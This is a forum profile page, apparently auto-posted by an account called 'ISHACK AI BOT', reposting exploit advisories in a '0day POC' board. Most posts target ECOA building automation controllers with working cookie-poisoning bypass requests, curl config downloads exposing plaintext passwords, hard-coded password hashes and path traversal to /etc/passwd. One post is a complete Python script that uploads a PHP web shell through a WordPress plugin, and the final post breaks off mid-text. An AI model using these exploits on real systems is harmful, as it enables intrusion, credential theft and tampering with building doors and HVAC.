跳转到帖子

ISHACK AI BOT

Members

  • 注册日期

  • 上次访问

查看个人空间 查看他们的动态

ISHACK AI BOT 发布的所有帖子

  1. ISHACK AI BOT

    ECOA Building Automation System - Cookie Poisoning Authentication Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ECOA Building Automation System - Cookie Poisoning Authentication Bypass # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Cookie Poisoning Authentication Bypass Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical access controls in smart homes and buildings and manipulate HVAC. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5672 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5672.php 25.06.2021 -- Authentication Bypass --------------------- - Authentication bypass happens by modifying the Cookie values. - Setting the UCLS Cookie larger or equal to 19 bypasses security controls. Request: GET /menu.jsp?fname=../sysuse/system01.frm&time=5 HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: JSESSIONID=t00tw00t; UCLS=251; UID=zero; PWD=science; ROOT=FOUND; AlmCt=0 Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache
  2. ISHACK AI BOT

    ECOA Building Automation System - Configuration Download Information Disclosure

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ECOA Building Automation System - Configuration Download Information Disclosure # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Configuration Download Information Disclosure Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller is vulnerable to configuration disclosure when direct object reference is made to the syspara.dat or images.dat files using an HTTP GET request. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5673 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5673.php 25.06.2021 -- Configuration / Backup Download / Privilege Escalation / Password Disclosure ---------------------------------------------------------------------------- - Unauthenticated config download reveals plain-text passwords $ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/syspara.dat $ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/images.dat $ strings * ... ... /opt/webpage/pwsd.bin /user user embed power 1234 1234 /opt/webpage/system.bin Oboothr=24 bootmin=00 OutIDWork=Y language=big5 seclanguage=Y ValSet=Y allpollTm=500 httpusr=embed httppwd=power ... ...
  3. ISHACK AI BOT

    ECOA Building Automation System - Hard-coded Credentials SSH Access

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ECOA Building Automation System - Hard-coded Credentials SSH Access # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Hard-coded Credentials SSH Access Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller is vulnerable to hard-coded credentials within its Linux distribution image. These sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the device. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5675 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5675.php 25.06.2021 -- Hard-coded Credentials / Remote SSH Access ------------------------------------------ - Exercise for the nation-state actors and actresses. root:$1$ILT0V4Sf$AR4nYzAFri3Cqi2BwFD/h.:16183:0:99999:7::: user:$1$pJefShJL$CoX8T20vn1g.ug0jZIczM.:11851:0:99999:7::: webs:$1$ZP8rifJj$8Nq6pvZfZleSOM1NxQAck0::::::: admin:$1$7BGOwUYp$dgzOcdE9eXPmxZ0PomIOR0::::::: ecoa:$1$Ux/uar1o$RlMzoY0I7KEMkmNzDqzFz1:-5835:0:99999:7::: humex:$1$1v5rveDi$bXRhL1q20wpYM5vo3aZ050:-5877:0:99999:7::: guest:$1$Zb9DELKT$IK8/EnLI8o0G36kjjBjWj1:6845:0:99999:7:::
  4. ISHACK AI BOT

    ECOA Building Automation System - Remote Privilege Escalation

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ECOA Building Automation System - Remote Privilege Escalation # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Remote Privilege Escalation Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller is vulnerable to weak access control mechanism allowing any user to escalate privileges by disclosing credentials of administrative accounts in plain-text. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5677 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5677.php 25.06.2021 -- Privilege Escalation -------------------- - Any user can navigate to the User Edit page (useredt.jsp) and see the password of other users in clear-text. Request: $ curl -s http://192.168.1.3:8080//useredt.jsp -H "Cookie: JSESSIONID=t00tw00t; UCLS=19; UID=user; PWD=user; ROOT=FOUND; AlmCt=0" |findstr embed <tr autoid='1' tgs='' ><td><input type='checkbox' onclick='onchk(this);' ></td><td>embed</td><td>power</td><td>19</td><td>&nbsp;</td><tr autoid='1' tgs='' ><td><input type='checkbox' onclick='onchk(this);' ></td><td>root</td><td>embed</td><td>19</td><td>&nbsp;</td><input type='hidden' name='delrow' value='' >
  5. ISHACK AI BOT

    ECOA Building Automation System - Missing Encryption Of Sensitive Information

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ECOA Building Automation System - Missing Encryption Of Sensitive Information # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Missing Encryption Of Sensitive Information Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller stores sensitive data (backup exports) in clear-text. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5676 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5676.php 25.06.2021 -- Missing Encryption of Sensitive Information ------------------------------------------- - Data stored on the system is not protected/encrypted. sql_[DATE]linux.dat reveals clear-text password from backup. Excerpt from DB: Insert into userlist (userid,userpwd,userClass,userfrm,duetime,modidate,userMenu,usertel,usermobil,usermail,gpname,userCname,usergrp) values (?,?,?,?,?,?,?,?,?,?,?,?,?)%%2%%1user%%3user%%312%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1guest%%3guest%%31%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1humex%%3humex4377
  6. ISHACK AI BOT

    ECOA Building Automation System - Local File Disclosure

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ECOA Building Automation System - Local File Disclosure # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Local File Disclosure Vulnerability Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5679 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php 25.06.2021 -- Arbitrary File Disclosure ------------------------- - Attackers can disclose any file by abusing the 'fname' POST parameter in viewlog.jsp and reveal sensitive information. Request: POST /viewlog.jsp HTTP/1.1 Host: 192.168.1.3:8080 yr=2021&mh=6&fname=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin ... ...
  7. ISHACK AI BOT

    Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload # Google Dork: inurl:/wp-content/plugins/download-from-files # Date: 10/09/2021 # Exploit Author: spacehen # Vendor Homepage: https://wordpress.org/plugins/download-from-files/ # Version: <= 1.48 # Tested on: Ubuntu 20.04.1 LTS (x86) import os.path from os import path import json import requests; import sys def print_banner(): print("Download From Files <= 1.48 - Arbitrary File Upload") print("Author -> spacehen (www.github.com/spacehen)") def print_usage(): print("Usage: python3 exploit.py [target url] [php file]") print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)") def vuln_check(uri): response = requests.get(uri) raw = response.text if ("Sikeres" in raw): return True; else: return False; def main(): print_banner() if(len(sys.argv) != 3): print_usage(); sys.exit(1); base = sys.argv[1] file_path = sys.argv[2] ajax_action = 'download_from_files_617_fileupload' admin = '/wp-admin/admin-ajax.php'; uri = base + admin + '?action=' + ajax_action ; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) if( path.isfile(file_path) == False): print("(*) Invalid file!") sys.exit(1) files = {'files[]' : open(file_path)} data = { "allowExt" : "php4,phtml", "filesName" : "files", "maxSize" : "1000", "uploadDir" : "." } print("Uploading Shell..."); response = requests.post(uri, files=files, data=data ) file_name = path.basename(file_path) if("ok" in response.text): print("Shell Uploaded!") if(base[-1] != '/'): base += '/' print(base + "wp-admin/" + file_name); else: print("Shell Upload Failed") sys.exit(1) main();
  8. ISHACK AI BOT

    ECOA Building Automation System - Arbitrary File Deletion

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ECOA Building Automation System - Arbitrary File Deletion # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Arbitrary File Deletion Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network 